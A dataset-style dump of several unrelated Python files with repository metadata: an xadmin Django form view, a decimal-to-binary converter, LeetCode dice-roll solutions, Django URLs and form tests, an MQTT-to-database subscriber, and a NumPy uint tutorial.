from crispy_forms.utils import TEMPLATE_PACK
from django import forms
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import PermissionDenied, FieldError
from django.db import models, transaction
from django.forms.models import modelform_factory, modelform_defines_fields
from django.http import Http404, HttpResponseRedirect
from django.template.response import TemplateResponse
from django.utils import six
from django.utils.encoding import force_text
from django.utils.html import escape
from django.utils.text import capfirst, get_text_list
from django.template import loader
from django.utils.translation import ugettext as _
from django.forms.widgets import Media
from xadmin import widgets
from xadmin.layout import FormHelper, Layout, Fieldset, TabHolder, Container, Column, Col, Field
from xadmin.util import unquote
from xadmin.views.detail import DetailAdminUtil
from .base import ModelAdminView, filter_hook, csrf_protect_m
FORMFIELD_FOR_DBFIELD_DEFAULTS = {
models.DateTimeField: {
'form_class': forms.SplitDateTimeField,
'widget': widgets.AdminSplitDateTime
},
models.DateField: {'widget': widgets.AdminDateWidget},
models.TimeField: {'widget': widgets.AdminTimeWidget},
models.TextField: {'widget': widgets.AdminTextareaWidget},
models.URLField: {'widget': widgets.AdminURLFieldWidget},
models.IntegerField: {'widget': widgets.AdminIntegerFieldWidget},
models.BigIntegerField: {'widget': widgets.AdminIntegerFieldWidget},
models.CharField: {'widget': widgets.AdminTextInputWidget},
models.IPAddressField: {'widget': widgets.AdminTextInputWidget},
models.ImageField: {'widget': widgets.AdminFileWidget},
models.FileField: {'widget': widgets.AdminFileWidget},
models.ForeignKey: {'widget': widgets.AdminSelectWidget},
models.OneToOneField: {'widget': widgets.AdminSelectWidget},
models.ManyToManyField: {'widget': widgets.AdminSelectMultiple},
}
class ReadOnlyField(Field):
template = "xadmin/layout/field_value.html"
def __init__(self, *args, **kwargs):
self.detail = kwargs.pop('detail')
super(ReadOnlyField, self).__init__(*args, **kwargs)
def render(self, form, form_style, context, template_pack=TEMPLATE_PACK, **kwargs):
html = ''
for field in self.fields:
result = self.detail.get_field_result(field)
field = {'auto_id': field}
html += loader.render_to_string(
self.template, {'field': field, 'result': result})
return html
class ModelFormAdminView(ModelAdminView):
form = forms.ModelForm
formfield_overrides = {}
readonly_fields = ()
style_fields = {}
exclude = None
relfield_style = None
save_as = False
save_on_top = False
add_form_template = None
change_form_template = None
form_layout = None
def __init__(self, request, *args, **kwargs):
overrides = FORMFIELD_FOR_DBFIELD_DEFAULTS.copy()
overrides.update(self.formfield_overrides)
self.formfield_overrides = overrides
super(ModelFormAdminView, self).__init__(request, *args, **kwargs)
@filter_hook
def formfield_for_dbfield(self, db_field, **kwargs):
# If it uses an intermediary model that isn't auto created, don't show
# a field in admin.
if isinstance(db_field, models.ManyToManyField) and not db_field.remote_field.through._meta.auto_created:
return None
attrs = self.get_field_attrs(db_field, **kwargs)
return db_field.formfield(**dict(attrs, **kwargs))
@filter_hook
def get_field_style(self, db_field, style, **kwargs):
if style in ('radio', 'radio-inline') and (db_field.choices or isinstance(db_field, models.ForeignKey)):
attrs = {'widget': widgets.AdminRadioSelect(
attrs={'inline': 'inline' if style == 'radio-inline' else ''})}
if db_field.choices:
attrs['choices'] = db_field.get_choices(
include_blank=db_field.blank,
blank_choice=[('', _('Null'))]
)
return attrs
if style in ('checkbox', 'checkbox-inline') and isinstance(db_field, models.ManyToManyField):
return {'widget': widgets.AdminCheckboxSelect(attrs={'inline': style == 'checkbox-inline'}),
'help_text': None}
@filter_hook
def get_field_attrs(self, db_field, **kwargs):
if db_field.name in self.style_fields:
attrs = self.get_field_style(
db_field, self.style_fields[db_field.name], **kwargs)
if attrs:
return attrs
if hasattr(db_field, "rel") and db_field.rel:
related_modeladmin = self.admin_site._registry.get(db_field.rel.to)
if related_modeladmin and hasattr(related_modeladmin, 'relfield_style'):
attrs = self.get_field_style(
db_field, related_modeladmin.relfield_style, **kwargs)
if attrs:
return attrs
if db_field.choices:
return {'widget': widgets.AdminSelectWidget}
for klass in db_field.__class__.mro():
if klass in self.formfield_overrides:
return self.formfield_overrides[klass].copy()
return {}
@filter_hook
def prepare_form(self):
self.model_form = self.get_model_form()
@filter_hook
def instance_forms(self):
self.form_obj = self.model_form(**self.get_form_datas())
def setup_forms(self):
helper = self.get_form_helper()
if helper:
self.form_obj.helper = helper
@filter_hook
def valid_forms(self):
return self.form_obj.is_valid()
@filter_hook
def get_model_form(self, **kwargs):
"""
Returns a Form class for use in the admin add view. This is used by
add_view and change_view.
"""
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(self.get_readonly_fields())
if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
# Take the custom ModelForm's Meta.exclude into account only if the
# ModelAdmin doesn't define its own.
exclude.extend(self.form._meta.exclude)
# if exclude is an empty list we pass None to be consistant with the
# default on modelform_factory
exclude = exclude or None
defaults = {
"form": self.form,
"fields": self.fields and list(self.fields) or None,
"exclude": exclude,
"formfield_callback": self.formfield_for_dbfield,
}
defaults.update(kwargs)
if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
defaults['fields'] = forms.ALL_FIELDS
return modelform_factory(self.model, **defaults)
try:
return modelform_factory(self.model, **defaults)
except FieldError as e:
raise FieldError('%s. Check fields/fieldsets/exclude attributes of class %s.'
% (e, self.__class__.__name__))
@filter_hook
def get_form_layout(self):
layout = copy.deepcopy(self.form_layout)
arr = self.form_obj.fields.keys()
if six.PY3:
arr = [k for k in arr]
fields = arr + list(self.get_readonly_fields())
if layout is None:
layout = Layout(Container(Col('full',
Fieldset("", *fields, css_class="unsort no_title"), horizontal=True, span=12)
))
elif type(layout) in (list, tuple) and len(layout) > 0:
if isinstance(layout[0], Column):
fs = layout
elif isinstance(layout[0], (Fieldset, TabHolder)):
fs = (Col('full', *layout, horizontal=True, span=12),)
else:
fs = (Col('full', Fieldset("", *layout, css_class="unsort no_title"), horizontal=True, span=12),)
layout = Layout(Container(*fs))
rendered_fields = [i[1] for i in layout.get_field_names()]
container = layout[0].fields
other_fieldset = Fieldset(_(u'Other Fields'), *[f for f in fields if f not in rendered_fields])
if len(other_fieldset.fields):
if len(container) and isinstance(container[0], Column):
container[0].fields.append(other_fieldset)
else:
container.append(other_fieldset)
return layout
def get_form_helper(self):
helper = FormHelper()
helper.form_tag = False
helper.include_media = False
helper.add_layout(self.get_form_layout())
# deal with readonly fields
readonly_fields = self.get_readonly_fields()
if readonly_fields:
detail = self.get_model_view(
DetailAdminUtil, self.model, self.form_obj.instance)
for field in readonly_fields:
helper[field].wrap(ReadOnlyField, detail=detail)
return helper
@filter_hook
def get_readonly_fields(self):
"""
Hook for specifying custom readonly fields.
"""
return self.readonly_fields
@filter_hook
def save_forms(self):
self.new_obj = self.form_obj.save(commit=False)
@filter_hook
def change_message(self):
change_message = []
if self.org_obj is None:
change_message.append(_('Added.'))
elif self.form_obj.changed_data:
change_message.append(_('Changed %s.') % get_text_list(self.form_obj.changed_data, _('and')))
change_message = ' '.join(change_message)
return change_message or _('No fields changed.')
@filter_hook
def save_models(self):
self.new_obj.save()
flag = self.org_obj is None and 'create' or 'change'
self.log(flag, self.change_message(), self.new_obj)
@filter_hook
def save_related(self):
self.form_obj.save_m2m()
@csrf_protect_m
@filter_hook
def get(self, request, *args, **kwargs):
self.instance_forms()
self.setup_forms()
return self.get_response()
@csrf_protect_m
@transaction.atomic
@filter_hook
def post(self, request, *args, **kwargs):
self.instance_forms()
self.setup_forms()
if self.valid_forms():
self.save_forms()
self.save_models()
self.save_related()
response = self.post_response()
cls_str = str if six.PY3 else basestring
if isinstance(response, cls_str):
return HttpResponseRedirect(response)
else:
return response
return self.get_response()
@filter_hook
def get_context(self):
add = self.org_obj is None
change = self.org_obj is not None
new_context = {
'form': self.form_obj,
'original': self.org_obj,
'show_delete': self.org_obj is not None,
'add': add,
'change': change,
'errors': self.get_error_list(),
'has_add_permission': self.has_add_permission(),
'has_view_permission': self.has_view_permission(),
'has_change_permission': self.has_change_permission(self.org_obj),
'has_delete_permission': self.has_delete_permission(self.org_obj),
'has_file_field': True, # FIXME - this should check if form or formsets have a FileField,
'has_absolute_url': hasattr(self.model, 'get_absolute_url'),
'form_url': '',
'content_type_id': ContentType.objects.get_for_model(self.model).id,
'save_as': self.save_as,
'save_on_top': self.save_on_top,
}
# for submit line
new_context.update({
'onclick_attrib': '',
'show_delete_link': (new_context['has_delete_permission']
and (change or new_context['show_delete'])),
'show_save_as_new': change and self.save_as,
'show_save_and_add_another': new_context['has_add_permission'] and
(not self.save_as or add),
'show_save_and_continue': new_context['has_change_permission'],
'show_save': True
})
if self.org_obj and new_context['show_delete_link']:
new_context['delete_url'] = self.model_admin_url(
'delete', self.org_obj.pk)
context = super(ModelFormAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_error_list(self):
errors = forms.utils.ErrorList()
if self.form_obj.is_bound:
errors.extend(self.form_obj.errors.values())
return errors
@filter_hook
def get_media(self):
try:
m = self.form_obj.media
except:
m = Media()
return super(ModelFormAdminView, self).get_media() + m + \
self.vendor('xadmin.page.form.js', 'xadmin.form.css')
class CreateAdminView(ModelFormAdminView):
def init_request(self, *args, **kwargs):
self.org_obj = None
if not self.has_add_permission():
raise PermissionDenied
# comm method for both get and post
self.prepare_form()
@filter_hook
def get_form_datas(self):
# Prepare the dict of initial data from the request.
# We have to special-case M2Ms as a list of comma-separated PKs.
if self.request_method == 'get':
initial = dict(self.request.GET.items())
for k in initial:
try:
f = self.opts.get_field(k)
except models.FieldDoesNotExist:
continue
if isinstance(f, models.ManyToManyField):
initial[k] = initial[k].split(",")
return {'initial': initial}
else:
return {'data': self.request.POST, 'files': self.request.FILES}
@filter_hook
def get_context(self):
new_context = {
'title': _('Add %s') % force_text(self.opts.verbose_name),
}
context = super(CreateAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_breadcrumb(self):
bcs = super(ModelFormAdminView, self).get_breadcrumb()
item = {'title': _('Add %s') % force_text(self.opts.verbose_name)}
if self.has_add_permission():
item['url'] = self.model_admin_url('add')
bcs.append(item)
return bcs
@filter_hook
def get_response(self):
context = self.get_context()
context.update(self.kwargs or {})
return TemplateResponse(
self.request, self.add_form_template or self.get_template_list(
'views/model_form.html'),
context)
@filter_hook
def post_response(self):
"""
Determines the HttpResponse for the add_view stage.
"""
request = self.request
msg = _(
'The %(name)s "%(obj)s" was added successfully.') % {'name': force_text(self.opts.verbose_name),
'obj': "<a class='alert-link' href='%s'>%s</a>" % (self.model_admin_url('change', self.new_obj._get_pk_val()), force_text(self.new_obj))}
if "_continue" in request.POST:
self.message_user(
msg + ' ' + _("You may edit it again below."), 'success')
return self.model_admin_url('change', self.new_obj._get_pk_val())
if "_addanother" in request.POST:
self.message_user(msg + ' ' + (_("You may add another %s below.") % force_text(self.opts.verbose_name)), 'success')
return request.path
else:
self.message_user(msg, 'success')
# Figure out where to redirect. If the user has change permission,
# redirect to the change-list page for this object. Otherwise,
# redirect to the admin index.
if "_redirect" in request.POST:
return request.POST["_redirect"]
elif self.has_view_permission():
return self.model_admin_url('changelist')
else:
return self.get_admin_url('index')
class UpdateAdminView(ModelFormAdminView):
def init_request(self, object_id, *args, **kwargs):
self.org_obj = self.get_object(unquote(object_id))
if not self.has_change_permission(self.org_obj):
raise PermissionDenied
if self.org_obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') %
{'name': force_text(self.opts.verbose_name), 'key': escape(object_id)})
# comm method for both get and post
self.prepare_form()
@filter_hook
def get_form_datas(self):
params = {'instance': self.org_obj}
if self.request_method == 'post':
params.update(
{'data': self.request.POST, 'files': self.request.FILES})
return params
@filter_hook
def get_context(self):
new_context = {
'title': _('Change %s') % force_text(self.org_obj),
'object_id': str(self.org_obj.pk),
}
context = super(UpdateAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_breadcrumb(self):
bcs = super(ModelFormAdminView, self).get_breadcrumb()
item = {'title': force_text(self.org_obj)}
if self.has_change_permission():
item['url'] = self.model_admin_url('change', self.org_obj.pk)
bcs.append(item)
return bcs
@filter_hook
def get_response(self, *args, **kwargs):
context = self.get_context()
context.update(kwargs or {})
return TemplateResponse(
self.request, self.change_form_template or self.get_template_list(
'views/model_form.html'),
context)
def post(self, request, *args, **kwargs):
if "_saveasnew" in self.request.POST:
return self.get_model_view(CreateAdminView, self.model).post(request)
return super(UpdateAdminView, self).post(request, *args, **kwargs)
@filter_hook
def post_response(self):
"""
Determines the HttpResponse for the change_view stage.
"""
opts = self.new_obj._meta
obj = self.new_obj
request = self.request
verbose_name = opts.verbose_name
pk_value = obj._get_pk_val()
msg = _('The %(name)s "%(obj)s" was changed successfully.') % {'name':
force_text(verbose_name), 'obj': force_text(obj)}
if "_continue" in request.POST:
self.message_user(
msg + ' ' + _("You may edit it again below."), 'success')
return request.path
elif "_addanother" in request.POST:
self.message_user(msg + ' ' + (_("You may add another %s below.")
% force_text(verbose_name)), 'success')
return self.model_admin_url('add')
else:
self.message_user(msg, 'success')
# Figure out where to redirect. If the user has change permission,
# redirect to the change-list page for this object. Otherwise,
# redirect to the admin index.
if "_redirect" in request.POST:
return request.POST["_redirect"]
elif self.has_view_permission():
change_list_url = self.model_admin_url('changelist')
if 'LIST_QUERY' in self.request.session \
and self.request.session['LIST_QUERY'][0] == self.model_info:
change_list_url += '?' + self.request.session['LIST_QUERY'][1]
return change_list_url
else:
return self.get_admin_url('index')
class ModelFormAdminUtil(ModelFormAdminView):
def init_request(self, obj=None):
self.org_obj = obj
self.prepare_form()
self.instance_forms()
@filter_hook
def get_form_datas(self):
return {'instance': self.org_obj}
| [
"laomd@mail2.sysu.edu.cn"
] | laomd@mail2.sysu.edu.cn |
11e91c0a3ba0798110b22f64e090eb985d0159ed | 67eb4ece1499a6fa6695859cfd439fb08aec20d8 | /decimal_to_binary_converter.py | 9dc6bbabbf0eab8a98d8ecde8a3b4478b8f54a18 | [] | no_license | nurarenke/study | c823aa43ee25d1d4db653b546889d4c8b2e739a0 | e117ff4eb9d5c0195f5ba4ea9edfe42a3d8c3507 | refs/heads/master | 2021-09-07T19:31:02.534763 | 2018-02-27T22:53:41 | 2018-02-27T22:53:41 | 100,279,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | '''Convert a decimal to a binary number string
>>> dec_to_bin(6)
'110'
>>> dec_to_bin(4)
'100'
>>> dec_to_bin(3)
'11'
'''
def dec_to_bin(number):
if number < 2:
return str(number)
else:
result = dec_to_bin(number/2) + dec_to_bin(number%2)
return str(result)
if __name__ == '__main__':
import doctest
if doctest.testmod().failed == 0:
print "\n*** ALL TEST PASSED!\n" | [
"nurarenke@gmail.com"
] | nurarenke@gmail.com |
cf7330a35aacb57aecc3cf237fab0a5660c9e136 | 7a550d2268bc4bc7e2fec608ffb1db4b2e5e94a0 | /1101-1200/1155-Number of Dice Rolls With Target Sum/1155-Number of Dice Rolls With Target Sum.py | f54e16cb49f5483bfd0bcd1a41d19b792bf96035 | [
"MIT"
] | permissive | jiadaizhao/LeetCode | be31bd0db50cc6835d9c9eff8e0175747098afc6 | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | refs/heads/master | 2021-11-05T04:38:47.252590 | 2021-10-31T09:54:53 | 2021-10-31T09:54:53 | 99,655,604 | 52 | 28 | MIT | 2020-10-02T12:47:47 | 2017-08-08T05:57:26 | C++ | UTF-8 | Python | false | false | 863 | py | class Solution:
def numRollsToTarget(self, d: int, f: int, target: int) -> int:
dp = [[0] * (1 + target) for _ in range(1 + d)]
dp[0][0] = 1
MOD = 10 ** 9 + 7
for i in range(1, 1 + d):
for j in range(1, 1 + target):
for k in range(1, 1 + min(f, j)):
dp[i][j] = (dp[i][j] + dp[i - 1][j - k]) % MOD
return dp[d][target]
class Solution2:
def numRollsToTarget(self, d: int, f: int, target: int) -> int:
dp = [0] * (1 + target)
dp[0] = 1
MOD = 10 ** 9 + 7
for i in range(1, 1 + d):
temp = [0] * (1 + target)
for j in range(1, 1 + target):
for k in range(1, 1 + min(f, j)):
temp[j] = (temp[j] + dp[j - k]) % MOD
dp = temp
return dp[target]
| [
"jiadaizhao@gmail.com"
] | jiadaizhao@gmail.com |
d200a1190b29b3a794c7e475966f760236ea799b | d3b362cc1339404ad0ae0ba1a1ca9a476a15dd66 | /user_profile/urls.py | 99398603b705c8c34a6f0fe7247dda887254b0ae | [
"MIT"
] | permissive | bitsnbytes7c8/django-site | 28e4e36b0846619aedf7bd37a7d17cfa88915852 | 1872974e8b578c971c60cc30c71a186e518ab801 | refs/heads/master | 2016-08-11T20:49:03.344384 | 2015-10-17T21:54:52 | 2015-10-17T21:54:52 | 44,455,598 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | from django.conf.urls import include, url
from django.contrib import admin
from . import views
urlpatterns = [
url(r'^create/$', views.create_profile),
url(r'^view/$', views.view_profile),
url(r'^edit/$', views.create_profile),
url(r'^view/(?P<username>[\w]+)/$', views.view_profile),
]
| [
"arjun.sn7c8@gmail.com"
] | arjun.sn7c8@gmail.com |
3db48a52f7eb63de746fb61792b5e142cdfc575d | 7f0e409b5c88f77624b3b41928181f9728e0e0ae | /1-List/53_maxSubArray.py | 9891922537c590f73059e22baa7e13ead57f0439 | [] | no_license | yangml6/LeetCode | e6f15d54dbcadbefe5f57439ee70a4075b7aaf8b | 1c487e09a0428bfeaf63ea8142a545090e2514f5 | refs/heads/master | 2021-05-15T20:58:39.025323 | 2018-11-28T02:56:02 | 2018-11-28T02:56:02 | 107,920,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,793 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 25 16:09:01 2017
@author: yml
"""
#求数组中连续子序列和的最大值
class Solution(object):
# def maxSubArray(self, nums):
# #超时了,,被拒绝
# """
# :type nums: List[int]
# :rtype: int
# """
# maxList = [nums[0]]
# localList = [nums[0]]
# localMax = nums[0]
#
#
# for i in range(0, len(nums)):
# count = nums[i]
# for j in range(i + 1,len(nums)):
# count = count + nums[j]
# localList.append(count)
# localMax = max(localList)
# maxList.append(localMax)
#
#
# return max(max(maxList),max(nums))
def maxSubArray(self, nums):
#每次求一个 max 就好了
local = globalMax = nums[0]
for n in nums:
local = max(n, local+n)#????
globalMax = max(local, globalMax)
return globalMax
if __name__ == '__main__':
nums = [-2,1,-3,4,-1,2,1,-5,4]
nums1 = [1,-2,1]
nums2 = [-2,1]
nums3 = [-64,78,56,10,-8,26,-18,47,-31,75,89,13,48,-19,-69,36,-39,55,-5,-4,-15,-37,-27,-8,-5,35,-51,83,21,-47,46,33,-91,-21,-57,0,81,1,-75,-50,-23,-86,39,-98,-29,69,38,32,24,-90,-95,86,-27,-23,-22,44,-88,3,27,9,55,-50,-80,40,5,-61,-82,-14,40,-58,35,93,-68,-26,94,3,-79,9,-88,21,19,-84,7,91,-8,84,12,-19,-13,-83,66,-80,-34,62,59,48,-98,53,-66,18,94,46,11,-73,96,-18,6,-83,91,17,38,10,9,-78,-22,77,83,89,-42,-30,-94,-98,-34,-51,63,-97,96,64,55,-93,-41,27,52,69,53,26,-71,-64,42,-80,52,-43,6,-62,-21,83,-85,-38,49,-50,8,55,-72,74,80,90,53,53,32,-15,36,90,-88,-34,37,41,91,65,76,33,61,5,90,-33,42,-54,-73,34,-16,75,83,91,7,-89,42,-36,77,-5,-83,9,80,53,-23,68,-81,90,10,-90,55,-14,19,-7,91,-14,59,33,31,62,-33,-85,37,-73,83,-78,-86,25,-15,91,97,2,-23,54,-68,53,22,-73,43,-68,-87,-25,18,31,67,-14,94,3,-81,25,-35,-37,17,79,-34,-23,-99,-43,-98,-38,-52,75,63,1,29,71,-68,-71,74,51,-40,86,-73,54,-5,70,-60,-11,-49,-64,90,-8,-25,-16,-52,40,60,-75,96,39,-13,-79,14,-73,22,-79,75,30,-51,49,-19,-15,36,-16,-60,-69,-68,-21,-4,-18,-9,-14,50,65,70,75,-17,30,99,-44,-31,-14,-46,60,-10,52,80,-35,-18,-94,-86,62,-10,49,-53,6,56,-45,62,-48,36,-47,15,-37,-81,-15,-62,-22,91,-85,33,-62,-23,86,97,66,15,54,-69,96,36,-55,36,-97,70,82,9,4,-63,-29,32,49,23,-53,88,18,8,-96,72,-23,-82,6,14,-6,-31,-12,-39,61,-58,-32,57,77,12,-7,56,-40,-48,-35,40,-35,12,-28,90,-87,-4,79,30,80,82,-20,-43,76,62,70,-30,-92,-42,7,68,-24,75,26,-70,-36,95,86,0,-52,-49,-60,12,63,-11,-20,75,84,-41,-18,41,-82,61,98,70,0,45,-83,8,-96,24,-24,-44,-24,-98,-14,39,97,-51,-60,-78,-24,-44,10,-84,44,89,67,5,-75,-73,-53,-81,64,-55,88,-35,89,-94,72,69,29,-52,-97,81,-73,-35,20,-99,13,36,98,65,69,8,81,13,-25,25,95,-1,51,-58,-5,16,-37,-17,57,-71,-35,29,75,70,53,77,51,79,-58,-51,56,31,84,54,-27,30,-37,-46,-56,14,56,-84,89,7,-43,-16,99,19,67,56,24,-68,-38,-1,-97,-84,-24,53,71,-6,-98,28,-98,63,-18,-25,-7,21,5,13,-88,-39,28,-98,68,61,-15,44,-43,-71,1,81,-39,62,-20,-60,54,33,69,26,-96,48,-69,-94,11,-11,-20,80,87,61,-29,98,-77,75,99,67,37,-38,11,93,-10,88,51,27,28,-68,66,-41,41,36,84,44,-16,91,49,71,-19,-94,28,-32,44,75,-57,66,51,-80,10,-35,-19,97,-65,70,63,86,-2,-9,94,-59,26,35,76,11,-21,-63,-21,-94,84,59,87,13,-96,31,-35,-53,-26,-84,-34,60,-20,23,58,15,-7,21,-22,67,88,-28,-91,14,-93,61,-98,-38,75,-19,-56,59,-83,-91,-51,-79,16,14,-56,90,6,-14,27,63,-91,-15,-22,-22,82,32,-54,47,-96,-69,-61,86,91,-60,-75,43,-3,-31,3,-9,-23,28,11,69,-81,31,59,25,-83,-36,-12,-75,48,42,-21,8,-26,24,-68,-23,31,-30,-60,0,-13,-36,-57,60,32,22,-49,85,-49,38,55,-54,-31,-9,70,-38,54,-65,-37,-20,76,42,64,-73,-57,95,-20,74,-57,19,-49,29,83,-7,-11,-8,-84,40,-45,-57,-45,86,-12,24,-46,-64,62,-91,-30,-74,-35,-76,44,-94,-73,86,77,7,37,-80,-74,87,48,85,-19,-85,-45,-27,31,9,-8,85,-28,79,-14,25,91,-51,10,-61,-49,74,-38,94,56,-12,57,34,71,-5,53,74,-18,-21,59,39,-30,90,-88,-99,-24,3,62,47,-40,-51,-27,-49,-26,82,-11,1,34,27,-5,-10,92,-48,-99,63,23,31,14,-94,-90,-49,44,-44,-59,33,-44,17,-64,-82,-36,-28,-57,13,0,-7,-4,88,70,-93,-7,-35,-4,-15,-6,-26,-75,93,-95,39,98,90,66,20,-54,-93,-47,-22,0,-35,-28,41,14,-8,-46,-86,84,26,-98,55,32,-29,96,-94,32,-33,-21,57,-39,-17,-27,-64,-50,-61,55,-28,-78,84,49,22,-73,-79,-37,40,12,-7,53,-26,-80,31,-94,51,-97,-98,56,34,-54,-88,-32,-17,-29,17,18,20,32,-49,91,54,-65,40,-47,-39,38,-8,-99,-73,84,30,0,-96,-38,5,32,-36,-16,-35,74,29,-23,-80,-88,47,36,29,-32,-54,79,-64,76,91,53,-71,-71,-9,-3,-93,17,-19,36,94,-38,97,-1,70,-62,82,-65,-87,11,11,-68,-1,-41,44,-71,3,89]
s = Solution()
res = s.maxSubArray(nums)
res1 = s.maxSubArray(nums1)
res2 = s.maxSubArray(nums2)
res3 = s.maxSubArray(nums3)
print(res)
print(res1)
print(res2)
print(res3) | [
"1952902819@qq.com"
] | 1952902819@qq.com |
16fcef6d63c434eacc476bc731df2f54419cd95e | a34739090209bf3b93563f95ba4f8da6a877dd22 | /DHT11/Subscribe.py | 480f58cb7b62541702d5fe9bb11621340d4e8809 | [] | no_license | nam2297ptit/DoAnThietKeHeThongNhung | 1048aa220fb55e6bea92c3373291095a39c5630f | 6cdacf87adecdfb1827b6cc56fbb23cca81c0244 | refs/heads/master | 2020-04-28T23:39:51.516526 | 2019-05-13T10:10:21 | 2019-05-13T10:10:21 | 175,664,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,633 | py | import paho.mqtt.client as mqtt
from Get_Data_to_DB import Sensor
# The callback for when the client receives a CONNACK response from the server.
#====================================================
# MQTT Settings
MQTT_Broker = "localhost"
MQTT_Port = 1883
Keep_Alive_Interval = 45
MQTT_Topic = "home/sensors/#"
#Connect MQTT broker
def on_connect(client, userdata, flags, rc):
if rc != 0:
pass
print ("Unable to connect to MQTT Broker...")
else:
print ("Connected with MQTT Broker: " + str(MQTT_Broker))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(MQTT_Topic,0)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
# This is the Master Call for saving MQTT Data into DB
# For details of "sensor_Data_Handler" function please refer "sensor_data_to_db.py"
print ("MQTT Data Received...")
print ("MQTT Topic: " + msg.topic)
print ("Data: " + str(msg.payload))
try:
Sensor(msg.payload)
except:
print("Error insert database!!")
print("-------------------")
client = mqtt.Client()
#client.username_pw_set(username="sammy",password="123456")
client.on_connect = on_connect
client.on_message = on_message
client.connect(MQTT_Broker,MQTT_Port, Keep_Alive_Interval)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever() | [
"namunjted1234@gmail.com"
] | namunjted1234@gmail.com |
efc48cf55cecc69f2b9a01cbc950890c053e3a77 | 31bc3fdc7c2b62880f84e50893c8e3d0dfb66fa6 | /libraries/numpy/python_369/python_369/numpy_118/built_in_scalars/uint_.py | 31601e10986c1a268eb3ab8a0b088f9f95f7615e | [] | no_license | tpt5cu/python-tutorial | 6e25cf0b346b8182ebc8a921efb25db65f16c144 | 5998e86165a52889faf14133b5b0d7588d637be1 | refs/heads/master | 2022-11-28T16:58:51.648259 | 2020-07-23T02:20:37 | 2020-07-23T02:20:37 | 269,521,394 | 0 | 0 | null | 2020-06-05T03:23:51 | 2020-06-05T03:23:50 | null | UTF-8 | Python | false | false | 1,496 | py | # https://numpy.org/doc/1.18/reference/arrays.scalars.html#built-in-scalar-types
import numpy as np
def what_is_uint():
'''
- "np.uint" and "np.uintc" are aliases for real underlying NumPy scalar types
- The values of those aliases depend on the operating system
- On my system, "np.uint" creates an object whose class is "numpy.uint64"
- "np.uint" has the same precision as ... ?
- On my system, "np.uintc" creates an object whose class is "numpy.uint32"
- "np.uintc" has the same precision as ... ?
- If I want some size other than those specified by the aliases, I'll have to use a class with an explicit size, e.g. np.uint8
'''
print(np.uint is np.uint64) # True
print(np.uintc is np.uint32) # True
# No error because 1 certainly fits within the size of a C long
ary = np.array(1, dtype=np.uint)
print(ary.dtype) # uint64
#print(int(10**50)) # 100000000000000000000000000000000000000000000000000
#np.array(10**50, dtype=np.uint) # OverflowError: Python int too large to convert to C long
print(type(np.uint)) # <class 'type'>
scalar = np.uint(10)
print(type(scalar)) # <class 'numpy.uint64'>
scalar = np.uint32(10)
print(type(scalar)) # <class 'numpy.uint32'>
scalar = np.uintc(10)
print(type(scalar)) # <class 'numpy.uint32'>
scalar = np.uint8(4)
print(type(scalar)) # <class 'numpy.uint8'>
if __name__ == '__main__':
what_is_uint()
| [
"uif93194@gmail.com"
] | uif93194@gmail.com |
247a9f709b4b7ea2e7a3f3f4a81ac637e230a66e | e9b740947aa14c9660505e64cdaa8a4ff1e2e322 | /eventex/subscriptions/tests/test_form_subscription.py | 18e821d5ec893bb34515f206c0cdeb0bbefb186e | [] | no_license | Leonardoperrella/eventex | 9dea1cb90acb9d32cd7dbaca16b5521eace48ea7 | e38f220876cb10fb75d4d4d3b073bca0c70d5669 | refs/heads/master | 2021-08-17T03:07:13.297640 | 2019-08-26T19:16:49 | 2019-08-26T19:16:49 | 145,333,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,238 | py | from django.test import TestCase
from eventex.subscriptions.forms import SubscriptionForm
class SubscriptionFormTest(TestCase):
def test_form_has_fields(self):
"""Form must have 4 fields."""
form = SubscriptionForm()
expected = ['name', 'cpf', 'email', 'phone']
self.assertSequenceEqual(expected, list(form.fields))
def test_cpf_is_digit(self):
"""Cpf must only accept digits"""
form = self.make_validated_form(cpf='ABCD5678901')
self.assertFormErrorCode(form, 'cpf', 'digits')
def test_cpf_has_11_digits(self):
"""cpf must have 11 digits"""
form = self.make_validated_form(cpf='1234')
self.assertFormErrorCode(form, 'cpf', 'length')
def test_must_be_capitalize(self):
"""Name must be captalize"""
#LEONARDO perrella -> Leonardo Perrella
form = self.make_validated_form(name='LEONARDO perrella')
self.assertEqual('Leonardo Perrella', form.cleaned_data['name'])
def test_email_is_optional(self):
"""Email is optional"""
form = self.make_validated_form(email='')
self.assertFalse(form.errors)
def test_must_inform_email_or_phone(self):
"""Email and Phone are optional, but one must be informed"""
form = self.make_validated_form(email='', phone='')
self.assertListEqual(['__all__'], list(form.errors))
def test_phone_is_optional(self):
"""Phone is optional"""
form = self.make_validated_form(phone='')
self.assertFalse(form.errors)
def assertFormErrorCode(self, form, field, code):
errors = form.errors.as_data()
errors_list = errors[field]
exception = errors_list[0]
self.assertEqual(code, exception.code)
def assertFormErrorMessage(self, form, field, msg):
errors = form.errors
errors_list = errors[field]
self.assertListEqual([msg], errors_list)
def make_validated_form(self, **kwargs):
valid = dict(name='Leonardo Perrella', cpf='12345678901',
email='leo@leo.com.br', phone='31-9994449494')
data = dict(valid, **kwargs)
form = SubscriptionForm(data)
form.is_valid()
return form
| [
"leonardo.perrella@yahoo.com.br"
] | leonardo.perrella@yahoo.com.br |
